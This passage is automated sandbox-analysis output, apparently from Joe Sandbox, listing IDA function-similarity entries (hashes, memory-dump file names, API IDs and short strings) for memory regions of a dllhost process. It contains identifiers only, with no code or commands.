                                            • Instruction ID: 811d4ffb98dc9d233e6165db154bc34841affafe0ac62184298f8f251a86d394
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: 3861A373908BC485E7719F15E44479AF7A0F785B98F045215EF9857BA6CFB8E2A0CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction ID: 8171af9a125c27db1cc64ddb86ace554fdda27bb41885fc41597da02c7867104
                                            • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction Fuzzy Hash: 5251163722478181FB649E25A45C3AAE751F39DB80F540029DD4943BABDFBBC724E740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction ID: 1f06067405b40fd82fc760fb4dd073a6e25f99fb4199ff1481cc77ec942db028
                                            • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction Fuzzy Hash: CB5126372147E181EB249E29A45CBAAE751FB84782F440025DE4943BBBDFBBC620C754
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction ID: ab2b79a212859c2f5f11f51e96d0048e4192331a59c1a7d5ad5dceae5862bcdc
                                            • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction Fuzzy Hash: 5F411733625B8086E750DF65E80879AF7A0F388784F840122EE4D877E9EFB9C611CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction ID: 0a0b5e9829fe41f79401f833e6f9d4dc0301e40be2113f80ac34c167d53fcfa3
                                            • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction Fuzzy Hash: B1411733625B8086E710DF25E4487DAF7A0F348784F804122EE8D87769EFB9C651CB50
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction ID: 14142a2abb3c38654503ac762a82b70e219fc3f6916c114fea68003a95a2f8b0
                                            • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction Fuzzy Hash: 2E113032215B4082EB618F25F848259F7E5F788B94F594225DECD47769EF7CC661CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction ID: 91075b45d6403016d119eee536c191ac490e5736f4a0368ab35acf38d4002181
                                            • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction Fuzzy Hash: 7F110A32214B8082EB618F25F848659F7E5FB88B94F594225EECD47B69DF7CC661CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: ntdll.dll
                                            • API String ID: 1646373207-2227199552
                                            • Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                            • Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
                                            • Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                            • Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction ID: 21bcbe9eb08e96f41574b13bc9bdf5b55190d8eb46002c2f2220e2dc0650844c
                                            • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction Fuzzy Hash: 7A11AD21A11F8081EB59CB66A80825DE7A0F78CFC1F594065DE4E537B6EF78D692C340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction ID: 9934bf8e3120549a92ca91d0354f1b3eee924f673dae606d522ce3de3f97881c
                                            • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction Fuzzy Hash: 12116D21A01F8085EB18CB66A80C66EE7A1F788FD1F594125DE4E53776EF78D552C340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                            • Instruction ID: 6e91e1ae57bb2f507bdd30ccb813d710b9eda330d3ff7d449275dd8231ce62c3
                                            • Opcode Fuzzy Hash: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                            • Instruction Fuzzy Hash: EBE032F1B41A0086E709DB63E80838936E1EB9CB85F898024AA0907371DF7D85D98B90
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction ID: f75b89b0be3653d734052a4b8f02e29eb73d101c453bd6fc03bd5ed26f405af9
                                            • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction Fuzzy Hash: BEE06D31601B049AE7548F62D80C349BAE1FB98F06F45C024C909073A1EFBD97A9C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction ID: cb99b5e6ee7f7de320ef7756ea76609db434d75e863704dd9919fdba4737a6db
                                            • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction Fuzzy Hash: F5E06D31601B049AE7148F62D80C369B6E1FB88F05F46C024C90907361EFBDC5A9C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                            • Instruction ID: a4bc93d2c7b124559308cf7a4161fd93bc4ab92d57e3b019964b2e6119ad9c46
                                            • Opcode Fuzzy Hash: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                            • Instruction Fuzzy Hash: B7E0EDF1B5150086E709DB63E84439976A1FB9CB55F858024DA1907731DE3885D58654
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction ID: dd5d7addd19cc3a3129c10dc5c839eeffd6f4debba431fe39a9f7dc969d36a0c
                                            • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction Fuzzy Hash: D6E06D71611B049AE7588B22D808248B6A1FB98B02F458021C909073A0FF7897A8D610